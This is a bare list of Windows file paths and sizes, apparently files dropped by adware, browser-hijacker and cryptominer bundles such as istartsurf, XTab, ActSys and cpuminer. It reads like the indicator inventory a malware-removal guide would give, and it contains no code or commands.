C:\Windows\System32\cpuminer-conf.json (420 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe (1279 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\UserInfo.dll (8 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[5].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (2444 bytes)
%Program Files% (x86)\ActSys\asfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SelfDel.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Program Files% (x86)\ActSys\ssleay32.dll (12088 bytes)
%Program Files% (x86)\ActSys\remove_ActSys.exe (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\asfilterdrv.sys (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\nsExec.dll (14 bytes)
%Program Files% (x86)\ActSys\ProtocolFilters.dll (38495 bytes)
%Program Files% (x86)\ActSys\ActSys.exe (15990 bytes)
%Program Files% (x86)\ActSys\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SimpleSC.dll (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscF0B5.tmp (140252 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Program Files% (x86)\ActSys\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\NJaxIntermediate.cer (774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
%Program Files% (x86)\ActSys\nfapi.dll (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\import_root_cert.exe (3406 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\settings.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\last_tab.js (4 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\83B.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\remoterequest.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\81A.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
%Program Files% (x86)\WNet\ssfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SimpleSC.dll (1921 bytes)
C:\Windows\System32\drivers\ssfilterdrv.sys (51 bytes)
%Program Files% (x86)\WNet\uninst.exe (2792 bytes)
%Program Files% (x86)\WNet\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\WNet\ProtocolFilters.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmEDE7.tmp (70570 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\WNet\ssleay32.dll (12088 bytes)
%Program Files% (x86)\WNet\WNet.exe (15606 bytes)
%Program Files% (x86)\WNet\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\System.dll (23 bytes)
%Program Files% (x86)\WNet\nfapi.dll (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[2] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[2] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\verificar_ip[1].htm (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_gs[1] (61315 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe (2736 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe (18984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\310714_is.exe (45524 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe (64441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1] (61024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmD143.tmp (3145 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe (64732 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe (64846 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe (34340 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe (33323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_mb[1] (1928 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\240714_ps[1].exe (32080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe (127352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_is[1] (42448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe (20815 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe (7390 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\310714_br[1].exe (61429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_cp[1].exe (5984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_a9[1].exe (31080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\291014_nj[1].exe (119929 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2KY9FDOQT8H9H3WIW6VT.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCWG3ST52CQ8BWKM1ZUM.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\749D80PVBSBBMHTBLUY1.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhED6B.tmp (112516 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhEA2F.tmp (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe (872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\checks.txt (253 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\amisid.exe (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\cpuminer-x11opt-setup.exe (151433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\post_reply.htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B7.tmp (3040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\cpuminer-x11opt-setup[1].exe (142739 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\nsisos.dll (13 bytes)
%Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
%Program Files% (x86)\XTab\skin\btn.png (2 bytes)
%Program Files% (x86)\XTab\install.data (68 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files% (x86)\XTab\HPNotify.exe (18514 bytes)
%Program Files% (x86)\XTab\conf (1626 bytes)
%Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1031.xpi (15 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\indexIE8.html (1794 bytes)
%Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
%Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\ver.txt (47 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
%Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
%Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
%Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
%Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
%Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
%Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\main.xml (4 bytes)
%Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
%Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
%Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5469 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn5B4A.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
